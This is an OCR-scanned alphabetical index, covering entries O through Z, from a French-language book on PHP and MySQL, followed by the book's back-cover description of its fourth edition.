LIKE 263, 288 
logiques 40 
new 42, 178 
paire de parentheses 47 
priorite 46 
sur les bits 41 
ternaire 42 
virgule 42 

Operations d'une classe 173 

appel 181 
creation 176 

Optimisation 

des enregistrements 224 
du code 542 
MySQL 320 
tables 320 

Options 

ORDER BY (clause) 269 
WITH GRANT OPTION 238 

Ouverture 

d'un fichier 65 

erreur 70 
d'une session 506, 573, 583, 704 
d'une URL 596 

Overloading 160 

Overriding 184 



Paiement en ligne 607, 631 
implementation 638 
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Panier virtuel (application web) 

affichage du contenu 626 

ajout d' articles 628 

base de donnees 612 

catalogue en ligne 615 

enregistrement 630 

FishCartSQL 649 

implementation 622 

interface d' administration 608, 640 

listage des livres 619 

paiement 607,631,638 

presentation de la solution 608 

Parametres 

de configuration Voir Directives 
d'une fonction 23, 161 

Parcours d'un tableau 109 

Parentheses 47 

parse_url() (fonction) 448 

Passer par reference/par valeur 166 

passthruO (fonction) 437 

PCRE (Perl-Compatible Regular 

Expression) 134 

PDF (Portable Document Format) 776, 789 
creation de documents 778 
PDFLib 793, 798 

PDFLib (bibliotheque) 779, 793, 803 

PEAR 296 

connexion a la base de donnees 297 
deconnexion de la base de donnees 298 
installation sous Windows 904 
requetes 298 

Perl (expressions regulieres) 134 

Permissions d'acces 70, 320, 431 

PGP (Pretty Good Privacy) 406 

Phorum (projet de forum web open-source) 

769 

PHP 

avantages 4 

conversion des formats de date 467 
en ligne de commande 525 



installation 

sous Unix 892 

sous Windows 902 
integration avec bases de donnees 5 
nouveautes 7 
PEAR 296 
presentation 2 
ressources web 907 
test 904 

php.ini (fichier) 154, 404, 424, 523, 560, 893, 
902 

phpinfo() (fonction) 33, 155, 439, 896 

Pieces jointes (envoi) 689 

PNG (Portable Network Graphics) 476, 477 

Point (.) 28,36, 135 

Point- virgule 21 

Polices 

PostScript Type 1 476 
selection 48 1 
TrueType 476 

determination de la taille optimale 489 

Polymorphisme 175 

POP (Post Office Protocol) 401 

POP3 (Post Office Protocol) 442 

popen() (fonction) 438 

Port (directive) 901 

Portee des variables 33, 163 

pos() (fonction) 109 

Position d'une sous-chaine 131 

POSIX (expressions regulieres) 134 

posix_getgrgid() (fonction) 434 

posix_getpwuid() (fonction) 434 

PostScript 775 

FType 1 (polices) 476 

Prefixe dollar ($) 24, 33 
prev() (fonction) 109 
PRIMARY KEY (mot-cle) 246 
Principe des privileges minimaux 236 
printf() (fonction) 120 
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Priorite des operateurs 46 

private 180, 183 
mot-cle 177 

Privileges 235, 299, 309 
affichage 311 
ALL 241 
ALTER 239 
attribution 236 
CREATE 239 
DELETE 239 
DROP 239 
EXECUTE 239 
FILE 309 
GRANT 239, 309 
INDEX 239 
INSERT 239 
modification 307 
PROCESS 240, 309 
REFERENCES 239 
RELOAD 240, 309 
SELECT 239 
SHUTDOWN 240, 309 
suppression 241 
types et niveaux 238 
UPDATE 239 
USAGE 241 

proc_close() (fonction) 438 

proc_open() (fonction) 438 

Procedures stockees 332 

PROCESS (privilege) 240, 309 

Processus 

affichage 313 
fonctions 438 

procs_priv (table) 300, 305 

Programmation 

fonctions 155-172 
HTML 16 

orientee objet 6, 197, 173-214 

exemple 753 
PHP 2 

reutilisation du code 145 



Proprietaire d'un script 523 

protected 183 

mot-cle 177 

Protocoles 

couches 401 

du niveau d' application 400 

FTP 69, 401,450 

HTTP 69, 383, 384, 400, 441 

IMAP401 

IMAP4 442 

IP (Internet Protocol) 400 

NNTP 442, 685 

POP 401 

POP3 442 

reseau 441 

SMTP 401,442 

TCP (Transmission Control Protocol) 400 

Prototype 

d'un projet 540 
d'une fonction 156 

public 180 

mot-cle 177 

Publiques 

cles (GPG) 408 
importation 410 

putenvO (fonction) 439 
R 

range() (fonction) 89, 105 
readdir() (fonction) 428 
readfileO (fonction) 79 
Reception d'e-mails 442 

Recherche 

de sous-chaines 129 

expressions regulieres 141 
litterale de caracteres speciaux 138 

Reconunandation de sites 567 

authentification des utilisateurs 568 

Recuperation des donnees d'autres 
serveurs web 443 
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Recursivite 170 
Redefinition (classe) 184 
Redondances 224 
Reference (operateur) 38, 167 
REFERENCES (privilege) 239 

REGEXP 

mot-cle 263 

Voir Expressions regulieres 
register_giobais (directive) 25 
Reinterpretation, variabies 49 
Reiations 221 

RELOAD 

commande 307 
privilege 240, 309 

Rempiacement de sous-chaTnes 129 

expressions regulieres 141 

renameO (fonction) 436 

Repertoires 

definition d'une structure 537 
lecture du contenu 427, 431 
obtention d' informations 431 

Replication 323 

configurer le maitre 323 

Requetes 

ajout de donnees 290 
avec PEAR 298 
debogage 314 

recuperation des donnees 289 
utilisation d'index 321 

require() (fonction) 147-154 

Reseau 

connexions a des services reseaux 554 
fonctions 445 
protocoles 441 

reset() (fonction) 94, 109 

Ressource (type) 3 1 

REST (Representational State Transfer) 

808 

Restauration des bases de donnees 322 



Retour 

chariot (caractere) 21, 73, 118, 119 
de valeurs 169 

return (mot-cle) 167 

Reutilisation du code 145, 531 

options de configuration 154 

require() 149 

REVOKE (commande) 236, 241 

rewind() (fonction) 81 

RFC (Requests For Comments) 441 

RLIKE (mot-cle) 263 

rmdir() (fonction) 43 1 

root (utilisateur MySQL) 235 

rsort() (fonction) 100 

RTF (Rich Text Format) 774, 786 
creation de documents 777 

S 

safe_mode_allowed_env_vars (directive) 

440 

Sauvegarde des bases de donnees 321 
Scalaires 87 
scandir(), fonction 430 
Schemas 221 

Scission de chaines 78, 107, 125 
Scripts 

date de derniere modification 523 
proprietaire 523 

secure (mot-cle) 504 

Securite 

Apache 404 
authentification 375 

de base (HTTP) 384 

et Apache 387 

et PHP 385 

personnalisee 393 
chiffrement 406 

controle d'acces, implementation 377 
cryptage 
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GPG (Gnu Privacy Guard) 407 
PGP (Pretty Good Privacy) 406 

depots de fichiers 426 

filtrage des donnees 403 

IIS 404 

mots de passe 308, 379 
MySQL 308-311 

Web 310 
ordinateurs des utilisateurs 396 
principe des privileges minimaux 236 
proteger plusieurs pages 383 
transactions 395 

Internet 398 

Secure Sockets Layer (SSL) 400 
stockage securise 404 
systeme de l'utilisateur 399 
transferts de fichiers 422 

SELECT 

instruction 260, 269 
privilege 239 

Selection de la base de donnees 287 

sendmail_path (directive) 893 

Separateur (choix d'un) 73, 125 

Serialisation 521 

serializeO, fonction 521, 846 

Serveurs 

esclaves 325 
maitre 323 
mysqld 308 
variables 

d'environnement 34, 439, 522 
modification 523 

predefinies 66 
Web, fonctionnement 228, 281 

session_set_cookie_params() (fonction) 505 

session_start() (fonction) 506, 509 

Sessions 

avec SSL 402 
controle 503-518 

configuration 510 
cookies 504-506 
demarrage 506, 573, 583, 704 
destruction 508 
exemple 508 



fermeture 586, 720 
FTP 452, 454 
ID de session 504, 506 
MySQL 233 
suppression 517 
variables 34 

set_error_handler() (fonction) 562 

set_time_limit() (fonction) 457, 458 

setcookieO (fonction) 505 

settypeO (fonction) 48 

SGBD (Systeme de gestion de base de 
donnees) Voir Bases de donnees 

shal() (fonction) 381 

short_tags (directive) 20 

SHOW (commande) 248, 311 
syntaxe 312 

show_source() (fonction) 524 

S-HTTP (Secure HyperText Transfer 
Protocol) 399 

shuffle() (fonction) 103 

SHUTDOWN (privilege) 240, 309 

Signes 

egal a (=) 26, 90 
dollar ($) 24, 33 

Sites web 

GNU Privacy Guard 407 
Netscape, specification 415 
New York Times 376 
PGP Security 406 
Slashdot 376 

sizeof() (fonction) 111 

Slashdot (site web) 376 

SMTP (Simple Mail Transfer Protocol) 40 1 , 

442 

SOAP (Simple Object Access Protocol) 808 
sort() (fonction) 88, 99 

Sous-requetes 273 

correlees 274 
de ligne 275 
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Soustraction (operateur) 35 
Specifications de conversion 121 
sprintf (fonction) 120 

SQL (Structured Query Language) 257 

casse 233 
erreurs 553 
ressources 910 

SSL (Secure Sockets Layer) 398 

compression 403 
couches de protocoles 401 
envoyer des donnees 402 
handshaking 401 
test 897 

stat() (fonction) 435 

Stockage 

des donnees 63-86 
sensibles 404, 406 

str_replace() (fonction) 132 

strcasecmpO (fonction) 128 

strcmpO (fonction) 128 

strftimeO (fonction) 465 

strip_tags() (fonction) 404, 425 

StripSlashesO (fonction) 123, 286, 404 

stristr() (fonction) 130 

strlen() (fonction) 129 

strpos() (fonction) 131 

strrnatcmpO (fonction) 128 

strrposO (fonction) 131 

strtok() (fonction) 126 

strtotolower() (fonction) 123 

strtoupper() (fonction) 123 

Structures 

de controle 50, 336 
declare 60 

interruption de l'execution 59 
de repetition 55 

Substitution de sous-chaines 132 

substr() (fonction) 127 

substr_replace() (fonction) 132 



Suggestion de sites 

authentification des utilisateurs 576 

base de donnees 572 

liens 

affichage 597 

ajout 594 

suppression 598 
mots de passe 587 
resume de la solution 570 
sessions 583 
suggestions de sites 600 

Suivi des utilisateurs 606 

Super-globales 33, 164 

Super-globaux, tableaux 26 

Suppression 

d'enregistrements 279 

d'un fichier 81 

d'une base de donnees 279 

de fichiers 436 

de repertoires 43 1 

de tables 279 

de variables de sessions 508 
des caracteres d'espacement 118 
des e-mails 681 
privileges 241 

Surcharge de fonction 160 

switch (instruction) 53 

Symbole % 121 

system() (fonction) 437 

PHP 361 

T 

Tableaux 31, 87-114 
$_COOKIE 34 
$_ENV 34 
$_FILES 34, 424 
$_GET 25, 34 
$_POST 25, 34 
$_REQUEST 25, 34 
$_SERVER 34, 66 
$_SESSION 34, 507,510 
$DOCUMENT_ROOT 66 
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$GLOBALS 34, 194 
$HTTP_GET_VARS 26 
$HTTP_POST_VARS 26, 515 
$HTTP_SESSION_VARS 510 
$HTTPD_SERVER_VARS 66 
a indices numeriques 89 
acces au contenu 90, 92 
associatifs 91 

conversion en scalaires 112 
decompte des elements 106, 111 
initialisation 89, 91 

a partir de fichiers 105 
manipulation 105 
multidimensionnels 95 

tri 100 
parcours 109 
super-globaux 26 

traitement individuel des elements 110 
tris 99 

aleatoires 103 

Tables 218, 228 
alias 268 
cle primaire 246 
columns_priv 300, 305 
creation 244 
db 300, 303 
des privileges 300 
host 300, 303 
jointure 264 

d'une table avec elle-meme 268, 601 

gauche 267 

types 269 
listage 248 

mise a jour des enregistrements 276 

modifications 276 

optimisation 320 

procs_priv 300, 305 

selection de donnees 269 

suppression 

d' enregistrements 279 

de la table 279 
tables_priv 300, 305 



types des colonnes 246, 25 1 
user 301 
verrouillage 321 

tables_priv (table) 300, 305 

Tabulations 21, 73, 78, 108, 118, 136 
horizontales et verticales 118 
indentation du code 535 

Tailled'un fichier 81, 457 

TCP (Transmission Control Protocol) 400 

Telechargement d'un fichier 455 

tempnam() (fonction) 413 

Ternaire (operateur) 42 

Tests 

de l'etat d'une variable 49 
logiciels 543 
PHP 904 

SSL (Secure Sockets Layer) 897 

Texte 

ASCII 772 

et creation d'images 484 

positionnement du texte 491 

TIFF 779 

TLS (Transport Layer Security) 403 
touch() (fonction) 436 
track_errors (directive) 42, 561 

Transactions 329 

commerciales (validation) 639 
de base de donnees 229 
securite 395 
Internet 398 

ordinateur de l'utilisateur 396 
Secure Sockets Layer (SSL) 400 
stockage 404 

systeme de l'utilisateur 399 

Transferts de fichiers 689, 723, 726 
modes 456 
securite 422 

Transtypage 32 

trigger_error() (fonction) 562 

trim() (fonction) 118,285 
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Tris 

aleatoires 103 

dans l'ordre inverse 100 

de tableaux 99 

multidimensionnels 100 
definis par l'utilisateur 101 

ordre inverse 103 

TrueType (polices) 476 

determination de la taille optimale 489 

Typage31 

Types 

colonnes 246, 25 1 

chaines 254 

dates 253 

numeriques 25 1 
des donnees 30 
MIME 482 
mixed 50 
NULL 31 
objets 31 
ressource 3 1 
tableaux 31, 87 
test 48 

U 

uasort() (fonction) 102 
ucfirst() (fonction) 123 
ucwords() (fonction) 123 
uksort() (fonction) 102 
umask() (fonction) 432 

Unix 

chemin d'acces 67 
configuration inclusions 154 
etiquette temporelle 523 
execution d'une commande 43 
horodatage 462 
installation 

a partir des sources 889 

avec des binaires 888 

de MySQL 890 

de PHP 892 

UNIX_TIMES_STAMP() (fonction) 468 
unlink() (fonction) 81, 414, 436 
unserializeO (fonction) 521 



unserializeO (fonction) 846 
unset() (fonction) 49, 164, 631, 752 
UPDATE 

instruction 276 

privilege 239 
upload_max_fllesize (directive) 424 
upload_tmp_dir (directive) 427 
URL 

analyse 448 

ouverture 596 

verification 445 
urlencodeO (fonction) 383, 445 
USAGE (privilege) 241 
use (instruction) 287 
user (table) 301 
usort() (fonction) 101 
Utilisateurs 

authentification 375, 568, 576 

controle d'acces, implementation 377 

creation des comptes 
listes de diffusion 702 

enregistrement 576 

inscriptions et desinscriptions a une liste de 

diffusion 716 
mots de passe 

modification 587, 718 

reinitialisation 589 
MySQL 

configuration 236, 242 

creation 235 

privileges 235, 238, 239, 299, 309, 311 
root 235 
suivi 606 

transactions securisees 396 
Utilitaires 

htpasswd 390 

myisamchk 322 

mysql_dump 322 

mysqladmin 250 

projets en developpement 540 

V 

Valeurs 219 
Null 227 

utilisation de valeurs atomiques 225 

Variables 

$DOCUMENT_ROOT 66 
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$HTTP_SERVER_VARS 66 
affectation de valeurs 30 
conventions de noms 533 
copie 26 
creation 30 

d'environnement 34, 439, 522 
GDFONTPATH 488 
modification 523 

datadir 250 

debogage 557 

des formulaires 24 

des sessions 

desenregistrement 517 
enregistrement 507 
suppression 508 
utilisation 507 

dynamiques 32 

fonctions 47 

globales 34, 164 

identificateurs 29 

locales 34, 335 

portee 33, 163 

predefmies du serveur 66 

reinterpretation 49 

scalaires 87 

super-globales 33, 164 

systeme (affichage) 313 

test de i'etat49 

types 30 

Verification 

adresse e-mail 579 

des donnees 285, 293, 555 

des URL 445 

mots de passe 579 

Verrouillage 

des fichiers 83 
des tables 321 

Virgule (,) 42 

W 

WBMP (Wireless Bitmap) 478 

Web 

conception de sites 
requireQ 149 



developpement de projets 529 
interface d' administration 608, 640, 720 
interrogation d'une base de donnees 285 
navigateurs 

transactions securisees 396 
securite, MySQL 310 
serveurs 

fonctionnement 228, 28 1 
stockage securise 404, 406 
Webmail (application web) 65 1 
WHERE (clause) 262, 265 
while (boucle) 56, 93 
Windows 
casse 250 

chemins d'acces 67, 427 
configuration 

des inclusions 154 
creation de fichiers PostScript 778 
execution d'une commande 43 
fonctions non prises en charge 435 
formats graphiques 476 
getmxrrO 449 
horodatage 462 
installation 

d'Apache 900 

de GPG 408 

de MySQL 898 

de PEAR 904 

de PHP 902 
lecteur Word 773 
lecture fichiers PostScript 775 
mode binaire 68 
Tera Term SSH 452 
umaskO 432 
WITH GRANT OPTION (option) 238 
Word (application Microsoft) 773 

X 

XML 20 

Z 

Zend 543 




PHP & MySQL 

PHP et MySQL sont des technologies open- 
source ideates pour developper rapidement des 
applications web faisant appel a des bases de 
donnees. 

Cet ouvrage complet expose avec clarte et exhaustivite 
comment combiner ces deux outils pour produire des sites web 
dynamiques, de leur expression la plus simple d des sites de 
commerce electronique securises et complexes. II presente en 
detail le langage PHP, montre comment mettre en place et utiliser 
une base de donnees MySQL, puis explique comment utiliser PHP 
pour interagir avec la base de donnees et le serveur web. 

Les auteurs vous guident dans la realisation d'applications 
reelles et pratiques, que vous pourrez ensuite deployer telles 
quelles ou personnaliser selon vos besoins. Vous apprendrez 
d resoudre des taches classiques comme I'authentification des 
utilisateurs, la construction d'un panier virtuel, la production 
dynamique de documents PDF et d'images, I'envoi et la gestion 
du courrier electronique, la connexion aux services web avec 
XML et le developpement d'applications web 2.0 avec Ajax. 

Soigneusement mis d jour et revise pour cette 4 e edition, cet 
ouvrage couvre les nouveautes de PHP 5 jusqu'd sa version 5.3 
et les fonctionnalites introduites par MySQL 5. 1 . 
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